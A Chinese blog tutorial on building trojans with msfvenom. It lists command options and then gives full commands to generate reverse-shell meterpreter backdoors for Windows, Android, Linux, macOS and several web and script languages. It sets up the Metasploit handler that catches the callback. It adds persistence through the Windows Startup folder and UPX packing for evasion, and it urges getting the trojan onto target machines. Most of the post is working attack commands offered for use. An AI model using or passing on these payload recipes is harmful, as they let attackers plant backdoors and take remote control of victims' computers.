msf美少妇使用
美少妇使用
使用Msfvenom生成木马渗透
msfvenom命令行选项如下:
英文原版
中文版:
Options:
-p, --payload
-l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
-n, --nopsled
-f, --format
-e, --encoder [encoder] 指定需要使用的encoder(编码器)
-a, --arch
-s, --space
-b, --bad-chars 设定规避字符集,比如: '\x00\xff'
-i, --iterations
-c, --add-code
-x, --template
-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行 --payload-options 列举payload的标准选项
-o, --out
-v, --var-name
--shellest 最小化生成payload
-h, --help 查看帮助选项 --help-formats 查看msf支持的输出格式列表
实操
MSF生成木马
我们用Msfvenom制作一个木马,发送给其他主机,只要其他主机运行了该木马,就会自动连接到我们的主机,并且建立一条TCP连接。我们可以通过这条TCP连接控制目标主机。
•–p (- -payload-options):添加载荷payload。载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT,就可以生成对应语言,对应平台的后门了!!!
•–l:查看所有payload encoder nops。
•–f :输出文件格式。
•–e:编码免杀。
•–a:选择架构平台 x86 | x64 | x86_64
•–o:文件输出
•–s:生成payload的最大长度,就是文件大小。
•–b:避免使用的字符 例如:不使用 ‘\0f’。
•–i:编码次数。
•–c:添加自己的shellcode
•–x | -k:捆绑
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.99.131 lport=8888 -f exe -o /muma/test.exe # lhost是我们的攻击主机ip,lport是我们主机的用于监听的端口,输出位置可以自定义
我们返回kali 开启msfconsole控制台,执行以下命令
msfcomsole msf > use exploit/multi/handler #使用exploit/multi/handler监听从肉鸡发来的数据 msf exploit(handler) > set payload windows/meterpreter/reverse_tcp #设置payload,不同的木马设置不同的payload msf exploit(handler) > set lhost 192.168.99.131 #我们的主机ip msf exploit(handler) > set lport 8888 #我们的主机监听端口 msf exploit(handler) > exploit
接下来就是等待目标触发木马了,此时我在物理机点击exe木马,立马弹回meter的会话
这台主机的shell,如果想持续性控制此主机,可以将木马放在开机启动项中,只要一开机就会触发。
C:\Users\$username$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
木马还可以进行upx加壳
upx -9 test.exe -k -o test2.exe
下面介绍一些生成其他格式的木马!
安卓app: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.10.27 LPORT=8888 -o ~/Desktop/test2.apk Linux: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.10.27 LPORT=8888 -f elf > shell.elf Mac: msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.10.27 LPORT=8888 -f macho > shell.macho PHP: msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.20.27 LPORT=4444 -f raw -o test.php ASP: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.27 LPORT=8888 -f asp > shell.asp ASPX: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.27 LPORT=8888 -f aspx > shell.aspx JSP: msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.10.27 LPORT=8888 -f raw > shell.jsp Bash: msfvenom -p cmd/unix/reverse_bash LHOST=192.168.10.27 LPORT=8888 -f raw > shell.sh Perl: msfvenom -p cmd/unix/reverse_perl LHOST=192.168.10.27 LPORT=8888 -f raw > shell.pl Python msfvenom -p python/meterpreter/reverser_tcp LHOST=192.168.10.27 LPORT=8888 -f raw > shell.py 以上是基本的生成后门木马,只要想方设法放到目标机器上,并运行。在本地监听端口即可,但是你需要有一个公网的ip
本文作者:crabin
本文链接:https://www.cnblogs.com/crabin/p/17092317.html
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步